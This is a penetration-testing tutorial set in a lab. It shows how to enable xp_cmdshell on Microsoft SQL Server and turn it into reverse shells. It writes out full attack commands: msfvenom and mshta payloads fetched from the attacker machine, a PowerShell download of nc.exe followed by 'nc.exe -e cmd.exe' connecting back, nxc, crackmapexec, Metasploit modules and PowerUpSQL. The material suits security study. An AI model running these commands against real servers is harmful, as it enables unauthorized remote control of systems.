MSSQL for Pentester: Command Execution with xp_cmdshell
xp_cmdshell command execution is a powerful technique available to penetration testers targeting Microsoft SQL Server environments. Microsoft introduced xp_cmdshell with T-SQL in SQL Server 6.0 (1995) as part of the extended stored procedures, allowing users to execute operating system commands directly from SQL Server. Transact-SQL (T-SQL), the extended version of SQL used by Microsoft, supports this feature through procedural programming constructs, control-of-flow statements, and additional built-in functions.
We will now dive into the details of xp_cmdshell and explore how to utilize it for command execution. Additionally, we will discuss the different methods of enabling xp_cmdshell, including using the GUI, sqsh, and impacket-mssqlclient.
Table of Contents
- Lab Setup
- Enabling xp_cmdshell (Using GUI)
- Enabling xp_cmdshell (Using sqsh)
- Enabling xp_cmdshell (Using impacket-mssqlclient)
- Exploiting MSSQL (Reverse shell)
- Reverse shell using reverse shell generator
- Reverse shell using .hta file
- Reverse shell using netcat binary
- Reverse shell using python script
- Reverse shell using nxc
- Reverse shell using crackmapexec and metasploit
- Command execution using PowerUPSQL
- Conclusion
Lab Setup
Target Machine: Windows (MSSQL Server) (192.168.31.126)
Attacker Machine: Kali Linux (192.168.31.141)
Setup of MSSQL server can be done using the steps given at this link: https://www.hackingarticles.in/penetration-testing-lab-setupms-sql/
Enabling xp_cmdshell (Using GUI)
After the setup is complete, we can proceed with the steps to enable xp_cmdshell. By default, xp_cmdshell remains disabled in MSSQL Server and requires administrative privileges to enable. In this case, we will use the SA user, who has administrative privileges. This account holds the highest level of permissions within the SQL Server environment and belongs to the sysadmin fixed server role.
Starting with the login into MSSQL server using the SA account.
Once the SQL instance runs with Administrator privileges, we can access Facets by right-clicking on the instance. In Microsoft SQL Server, Facets form a core part of the Policy-Based Management (PBM) framework. They include logical properties that can be configured to enforce specific policies on SQL Server instances.
Next, after clicking on Facets, a new window appears. In that window, select Surface Area Configuration. Surface Area Configuration refers to a group of logical properties that administrators can manage to control the configuration and feature availability of SQL Server instances.
Inside the Surface Area Configuration, we find the option for xp_cmdshell, which is set to False by default. Notably, xp_cmdshell creates a Windows process that inherits the same security rights as the SQL Server service.
To enable the feature, set xp_cmdshell to True
.
However, by default, xp_cmdshell remains disabled in MSSQL Server and requires administrative privileges to enable. Therefore, we will use the sp_configure stored procedure to enable xp_cmdshell via sqsh.
Enabling xp_cmdshell (Using sqsh)
sqsh is an inbuilt tool in kali linux. Here, we are going to check if xp_cmdshell is enabled on the target machine or not. But first we will connect to the MSSQL server using the following command:
sqsh -S 192.168.31.126 -U sa -P "Password@123"
After establishing the connection, execute the following command to verify whether xp_cmdshell is enabled:
xp_cmdshell 'whoami' ; go
At this point, we notice that the server has blocked access to the command shell procedure. Therefore, we will use thesp_configure stored procedure. sp_configure is a system procedure in Microsoft SQL Server used to view or modify server-level settings. To enable xp_cmdshell via sqsh, we need to execute the following commands in sequence:
EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; go xp_cmdshell 'whoami'; go
In addition to sqsh, we can also use impacket-mssqlclient to enable xp_cmdshell. Meanwhile, we will use the Windows authentication method to authenticate as the raj user.
Enabling xp_cmdshell (Using impacket-mssqlclient)
In the recent version of Microsoft MSSQL Server there are primarily 3 ways to authenticate:
- Windows authentication
- Microsoft Entra ID authentication
- SQL Server authentication
Here we are going to authenticate using the Windows authentication method as raj user.
Additionally, we can use the impacket-mssqlclient script to login to the system, and specifically, we use the following command for Windows authentication using the impacket-mssqlclient script.
impacket-mssqlclient raj:'Password@1'@192.168.31.126 -windows-auth
To enable the xp_cmdshell after login, use the following commands:
enable_xp_cmdshell xp_cmdshell whoami
Next, we will discuss the different methods of exploiting MSSQL, including using a reverse shell generator,.hta file, netcat binary, python script, nxc, and crackmapexec and metasploit. Additionally, we will use PowerUPSQL to execute commands on the target system.
Exploiting MSSQL (Reverse shell)
There are several ways to exploit an MSSQL Server. These include a direct reverse shell via command execution, exploitation using Metasploit, or leveraging a reverse shell generator script. In this section, we will discuss each method in detail.
Reverse shell using reverse shell generator
One common technique is to use a reverse shell command directly within the xp_cmdshell. You can copy the required payload from this location: https://www.revshells.com/
Meanwhile, we can start a listener at port 4444 on the Kali machine and copy the PowerShell encoded payload into xp_cmdshell. Here, we are using the PowerShell #3 (Base64) payload.
Next, paste the entire payload after the xp_cmdshell command within the shell.
Observe that once the payload executes viaxp_cmdshell, a reverse shell connection is successfully established on port 4444.
rlwrap nc -lvnp 4444
Reverse shell using .hta file
The .hta (HTML Application) file is a standalone script-based program created with HTML and executed using mshta.exe (Microsoft HTML Application Host).. In the context of xp_cmdshell in SQL Server, an .hta file can execute scripts or commands by leveraging VBScript, JavaScript, or other HTML-based technologies.
We can generate the .hta file using the msfvenom tool in Kali Linux, then upload it to the target system using xp_cmdshell to obtain a reverse shell.
Following will be the command for msfvenom:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.31.141 lport=1234 -f hta-psh > shell.hta
The shell.hta file can be directly executed from the xp_cmdshell using the mshta service.
The following command will be used in the xp_cmdshell:
xp_cmdshell "mshta http://192.168.31.141/shell.hta"
Observe that the reverse shell is obtained at port 1234 after running the command from xp_cmdshell.
rlwrap nc -lvnp 1234
Reverse shell using netcat binary
Kali Linux provides built-in Windows-compatible binaries. One such binary is nc.exe
(Netcat), located at /usr/share/windows-binaries
. We can upload the nc.exe
file to the target system using xp_cmdshell.
cd /usr/share/windows-binaries ls -al updog -p 80
The following commands can be run inside the xp_cmdshell to upload the nc.exe binary in the target system and then execute the binary to get a reverse shell.
xp_cmdshell "powershell wget http://192.168.31.141/nc.exe -OutFile c:\UsersPublic\nc.exe" xp_cmdshell "c:\UsersPublic\nc.exe -e cmd.exe 192.168.31.141 8888"
Observe that the reverse shell is obtained at the port 8888 in the kali machine.
rlwrap nc -lvnp 8888
Reverse shell using python script
Alternatively, a Python script can generate the reverse shell payload. This payload can be used within xp_cmdshell to establish a reverse shell connection. You can download the script from here:
https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58
The script requires two arguments — the attacker’s IP address and the listener’s port number. Use the following command to generate the payload with the Python script:
python3 mkpsrevshell.py 192.168.31.141 9999
Meanwhile, we use the output generated from the script directly in the xp_cmdshell to obtain a reverse shell at port 9999.
The reverse shell is obtained after the execution of the command in the xp_cmdshell.
rlwrap nc -lvnp 9999
Reverse shell using nxc
nxc (NetExec)—a successor to CrackMapExec—is a network service exploitation tool that lets users upload and download files. In this case, we will use nxc to upload nc.exe to the target system and establish a reverse shell.
cd /usr/share/windows-binaries ls -al nxc mssql 192.168.31.126 -u "raj" -p "Password@1" --put-file nc.exe c:\Users\Public\nc.exe
We use nxc to upload the nc.exe binary to the target system and execute system-level commands to establish a reverse shell.
nxc mssql 192.168.31.126 -u "raj" -p "Password@1" -x "c:\Users\Public\nc.exe -e cmd.exe 192.168.31.141 6666"
Meanwhile, we obtain the reverse shell on port 6666 on the Kali machine, and as a result, we can access the system remotely.
rlwrap nc -lvnp 6666
Reverse shell using crackmapexec and metasploit
Furthermore, Metasploit includes a web delivery exploit that generates a URL for transferring files to the target system. You can use the following commands to implement this technique:
msfconsole -q use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.31.141 run
Once the exploit runs, you’ll notice that Metasploit generates a URL hosting the payload. You can use this URL with the crackmapexec tool to execute the reverse shell.
In this example, the payload is available at:
http://192.168.31.141:8080/TrBYNRKFCChZSz
crackmapexec mssql 192.168.31.126 -u "raj" -p "Password@1" -M web_delivery -o URL=http://192.168.31.141:8080/TrBYNRKFCChZSz
Next, access the generated URL using the web delivery module of crackmapexec. Observe that a Meterpreter session is initiated upon access.
Additionally, you can use the mssql_payload exploit available in Metasploit. Once executed, this exploit opens a Meterpreter session. Use the following commands to run this module:
use exploit/windows/mssql/mssql_payload set rhost 192.168.31.126 set database master set username sa set password Password@123 run
We execute the exploit and subsequently obtain a Meterpreter session, thereby gaining access to the system.
Additionally, another viable method is to use the mssql_exec exploit within Metasploit. Therefore, the attacker manually inputs commands using this method, and then displays the output after establishing the connection.
Following are the commands to use this exploit:
use auxiliary/admin/mssql/mssql_exec set rhost 192.168.31.126 set database master set username sa set password Password@123 set cmd "ipconfig" run
Command execution using PowerUPSQL
Penetration testers and security professionals use PowerUpSQL to audit and assess SQL Server instances. It offers capabilities for discovering, enumerating, and exploiting SQL Server environments across enterprise networks. You can download the script from: https://github.com/NetSPI/PowerUpSQL
We actively utilize PowerUpSQL to audit and assess SQL Server instances, and subsequently, we verify that the user has sysadmin privileges and check the status of xp_cmdshell.
Finally, you can use the following PowerShell commands on the target system after gaining the initial shell:
powershell powershell -ep bypass Import-Module .PowerUpSQL.ps1 Invoke-SQLOSCmd -Username sa -Password Password@123 -Instance WIN-JE6KIAEEJ09SQLEXPRESS -Command whoami -Verbose
Conclusion
In conclusion, xp_cmdshell represents a highly useful feature provided by Microsoft for MSSQL Server. However, when misconfigured, it allows attackers to execute system-level commands. Therefore, organizations must ensure they do not expose sysadmin credentials under any circumstances, as compromising these credentials can result in unauthorized xp_cmdshell command execution, potentially enabling remote command execution.
Author: Vinayak Chauhan is an InfoSec researcher and Security Consultant. Contact here
Good article 🙂 Thank you for sharing this.